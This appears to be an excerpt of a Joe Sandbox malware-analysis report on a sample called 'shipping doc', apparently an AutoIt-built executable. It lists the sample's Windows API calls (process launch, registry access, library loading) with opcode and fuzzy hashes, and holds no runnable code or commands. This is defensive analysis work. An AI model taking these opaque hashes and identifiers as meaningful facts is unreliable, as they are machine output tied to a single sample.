                                                                                              • HeapFree.KERNEL32(00000000), ref: 001418AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: 38cdd4a2e2237d53a8649d48be79a78fb5ca899888cb6518b32a2741f6be87d7
                                                                                              • Instruction ID: a7bda341ab89a8fd79e94f6beb4109795fce94fd2ce21a0dae0c0602d6f6bbaa
                                                                                              • Opcode Fuzzy Hash: 38cdd4a2e2237d53a8649d48be79a78fb5ca899888cb6518b32a2741f6be87d7
                                                                                              • Instruction Fuzzy Hash: 07E07576104505FBEB015FA5ED0C94ABF79FF49B22B508629F22991871CB3294E1DF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E7620: _wcslen.LIBCMT ref: 000E7625
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0014C6EE
                                                                                              • _wcslen.LIBCMT ref: 0014C735
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0014C79C
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0014C7CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                                              • String ID: 0
                                                                                              • API String ID: 1227352736-4108050209
                                                                                              • Opcode ID: 0aa9a676e72c9ae94ecae3d5fdd7914ce7c424841a9418dfd35d6004931ee664
                                                                                              • Instruction ID: c0a9c59d56c9f8eaa46dab977450ed5eb86c750dfde2996a30e19a27ca502d02
                                                                                              • Opcode Fuzzy Hash: 0aa9a676e72c9ae94ecae3d5fdd7914ce7c424841a9418dfd35d6004931ee664
                                                                                              • Instruction Fuzzy Hash: 9C51F0726063419BD7949F28C885BBBB7E8AF49315F040A2DF995E32B1DB70D844CBD2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0016AEA3
                                                                                                • Part of subcall function 000E7620: _wcslen.LIBCMT ref: 000E7625
                                                                                              • GetProcessId.KERNEL32(00000000), ref: 0016AF38
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0016AF67
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                              • String ID: <$@
                                                                                              • API String ID: 146682121-1426351568
                                                                                              • Opcode ID: ef8cb4a21822b9a2f77ce0377ae0cb9c7675880279764d9aff12f35a78fd3919
                                                                                              • Instruction ID: 6b6995750cf5d642d9cc1b79018b5e10fbc2b65f005b0d442bbe1174c41a6c97
                                                                                              • Opcode Fuzzy Hash: ef8cb4a21822b9a2f77ce0377ae0cb9c7675880279764d9aff12f35a78fd3919
                                                                                              • Instruction Fuzzy Hash: FA716671A00659DFCB14DF65C884A9EBBF0BF08310F448499E81AAB3A2CB71ED41CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00147206
                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0014723C
                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0014724D
                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001472CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                              • String ID: DllGetClassObject
                                                                                              • API String ID: 753597075-1075368562
                                                                                              • Opcode ID: 03ce1db4fd26dcc1307509e52c9d547d59903ea42e526d39ed953362d0fd05c4
                                                                                              • Instruction ID: 4a35da40e4cbc9033440ef6f4c3dd217cce8d29acf32800452fd0fa8f486f3d0
                                                                                              • Opcode Fuzzy Hash: 03ce1db4fd26dcc1307509e52c9d547d59903ea42e526d39ed953362d0fd05c4
                                                                                              • Instruction Fuzzy Hash: 0D416171604204EFDB15CF64C884EAA7BB9EF44310F1580ADBD099F29AD7F1DA45CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00173E35
                                                                                              • IsMenu.USER32(?), ref: 00173E4A
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00173E92
                                                                                              • DrawMenuBar.USER32 ref: 00173EA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                              • String ID: 0
                                                                                              • API String ID: 3076010158-4108050209
                                                                                              • Opcode ID: 06bd67859aaafb92c9bce292863bbab74c6d2e186fc0ae1e97b139c559c603c3
                                                                                              • Instruction ID: ef1614cd3712485011dfbec0b9bfb712f1e86f9f777c2f0be1e50c6131058c9a
                                                                                              • Opcode Fuzzy Hash: 06bd67859aaafb92c9bce292863bbab74c6d2e186fc0ae1e97b139c559c603c3
                                                                                              • Instruction Fuzzy Hash: 87415B75A01209EFDB10DF50D884EEABBB5FF49354F048129F919A7250DB30AE45DF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 00143CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00143CCA
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00141E66
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00141E79
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00141EA9
                                                                                                • Part of subcall function 000E6B57: _wcslen.LIBCMT ref: 000E6B6A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 2081771294-1403004172
                                                                                              • Opcode ID: 9c99280830042940cafb29dd72dc6788d9bfc755c9ddae12e501c652dcb11deb
                                                                                              • Instruction ID: 771b3c50dc522558d8ad7ec46e002d493507ceb9068c61c01014ba93bcfd544d
                                                                                              • Opcode Fuzzy Hash: 9c99280830042940cafb29dd72dc6788d9bfc755c9ddae12e501c652dcb11deb
                                                                                              • Instruction Fuzzy Hash: FD216875A00104BEDB19ABA5DC86CFFB7B9EF42350B50411DF825B32F2EB344D8A8620
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                              • API String ID: 176396367-4004644295
                                                                                              • Opcode ID: 479aac1c2c7e0a3a8dbb3789da9a549cfa28be218186c06dd2ecf8d2c4894819
                                                                                              • Instruction ID: 12a842310d85d9f78473ce8efe5c13a7cc01fcb5885f0c7511a00b606cbba768
                                                                                              • Opcode Fuzzy Hash: 479aac1c2c7e0a3a8dbb3789da9a549cfa28be218186c06dd2ecf8d2c4894819
                                                                                              • Instruction Fuzzy Hash: 1531E473A0016A4BCB20DFACCD901BE33919BA5754B594129ECD5AB395FB71CEA0D3E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00172F8D
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00172F94
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00172FA9
                                                                                              • DestroyWindow.USER32(?), ref: 00172FB1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 3529120543-1011021900
                                                                                              • Opcode ID: 5b6b80d9cce0217fd3660733058f9469d25ca84bb2b381ca5f247475c81d6d96
                                                                                              • Instruction ID: fa275cf67f889ca066f60fbcf53bcf7840a1515d63ba7a0e3196093c28f64639
                                                                                              • Opcode Fuzzy Hash: 5b6b80d9cce0217fd3660733058f9469d25ca84bb2b381ca5f247475c81d6d96
                                                                                              • Instruction Fuzzy Hash: BA218C72204205ABEB104F64DC80EBB77B9EB59364F108619F958D6190D771DC929760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00104D1E,001128E9,?,00104CBE,001128E9,001A88B8,0000000C,00104E15,001128E9,00000002), ref: 00104D8D
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00104DA0
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00104D1E,001128E9,?,00104CBE,001128E9,001A88B8,0000000C,00104E15,001128E9,00000002,00000000), ref: 00104DC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: d94faedcf87e2eaf33df1d3a57e1f9853e8e69d310652498fdaa621b03c88d51
                                                                                              • Instruction ID: f16e31c7d783e2ee13ee89b768f70cbc0747cf519153020f00cfdc88043512d0
                                                                                              • Opcode Fuzzy Hash: d94faedcf87e2eaf33df1d3a57e1f9853e8e69d310652498fdaa621b03c88d51
                                                                                              • Instruction Fuzzy Hash: 1DF04F75A40208FBDB119F94DC49BEDBBB5EF58751F4400A8F949A26A0CB705AC0CBD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000E4EDD,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4E9C
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000E4EAE
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,000E4EDD,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-3689287502
                                                                                              • Opcode ID: a0d5a6b7986f722ed12e084b8133e1474ca76431b23078193e979887062665eb
                                                                                              • Instruction ID: abc9974678ad0e4bcdd4b4c6cdf3aef375d175d8c3719d3eecd6578b4227ae3c
                                                                                              • Opcode Fuzzy Hash: a0d5a6b7986f722ed12e084b8133e1474ca76431b23078193e979887062665eb
                                                                                              • Instruction Fuzzy Hash: C5E0CD35E015629FD2711B2A6C18B5FA6F4AFC1F62B050129FC08F3700DB60CD8185E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00123CDE,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4E62
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000E4E74
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00123CDE,?,001B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000E4E87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-1355242751
                                                                                              • Opcode ID: fbbbd98da796957b3d89b583a7c39815a5f2b914336d614a766d286501ee56a8
                                                                                              • Instruction ID: 255a4afc599c5e24859213285951522deb2beab0e812acbccc04e013d7b31346
                                                                                              • Opcode Fuzzy Hash: fbbbd98da796957b3d89b583a7c39815a5f2b914336d614a766d286501ee56a8
                                                                                              • Instruction Fuzzy Hash: F4D05B359027719B96761B2A7C1CECF6AB8AF8AF513494539F909F3614CF60CE81C5D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0016A427
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0016A435
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0016A468
                                                                                              • CloseHandle.KERNEL32(?), ref: 0016A63D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3488606520-0
                                                                                              • Opcode ID: 5e53893b1741a4551a0d1793b0b2f4ffa8743a34dcc9a2267bfcd04e60e3f7ed
                                                                                              • Instruction ID: c1be067e4862aa488c6be5ada1f1d150cecab2dd230bd4f8956bff0ba417447a
                                                                                              • Opcode Fuzzy Hash: 5e53893b1741a4551a0d1793b0b2f4ffa8743a34dcc9a2267bfcd04e60e3f7ed
                                                                                              • Instruction Fuzzy Hash: 24A1C1716043019FE720DF24DC82F6AB7E1AF84714F54881DF55AAB293DBB1EC418B92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0014DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0014CF22,?), ref: 0014DDFD
                                                                                                • Part of subcall function 0014DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0014CF22,?), ref: 0014DE16
                                                                                                • Part of subcall function 0014E199: GetFileAttributesW.KERNEL32(?,0014CF95), ref: 0014E19A
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0014E473
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0014E4AC
                                                                                              • _wcslen.LIBCMT ref: 0014E5EB
                                                                                              • _wcslen.LIBCMT ref: 0014E603
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0014E650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3183298772-0
                                                                                              • Opcode ID: d436a471f1b82f3b8cb08541756f7046167cddf836ba1f415a7b5b64805d118f
                                                                                              • Instruction ID: afeab50fcf176e64adbe8ba5b6b44b8a60a997bdb9d82c955a563fb1c3ef342d
                                                                                              • Opcode Fuzzy Hash: d436a471f1b82f3b8cb08541756f7046167cddf836ba1f415a7b5b64805d118f
                                                                                              • Instruction Fuzzy Hash: 425153B25083859FC724EB90DC819DB73ECAF94340F44491EF589D31A2EF74A588CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 0016C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0016B6AE,?,?), ref: 0016C9B5
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016C9F1
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016CA68
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016CA9E
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0016BAA5
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0016BB00
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0016BB63
                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0016BBA6
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0016BBB3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                              • String ID:
                                                                                              • API String ID: 826366716-0
                                                                                              • Opcode ID: bf5351c081526e3e5433666b15c769eb4fe689b10d71b4125924c637d7690ca9
                                                                                              • Instruction ID: 1e42263e5e20229016d45a80296d127e81ac6be1c424e8c5341689a9fd37b316
                                                                                              • Opcode Fuzzy Hash: bf5351c081526e3e5433666b15c769eb4fe689b10d71b4125924c637d7690ca9
                                                                                              • Instruction Fuzzy Hash: B5618F31208241AFD714DF64C8D1E6ABBE5FF84308F54895CF4998B2A2DB31ED85CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00148BCD
                                                                                              • VariantClear.OLEAUT32 ref: 00148C3E
                                                                                              • VariantClear.OLEAUT32 ref: 00148C9D
                                                                                              • VariantClear.OLEAUT32(?), ref: 00148D10
                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00148D3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
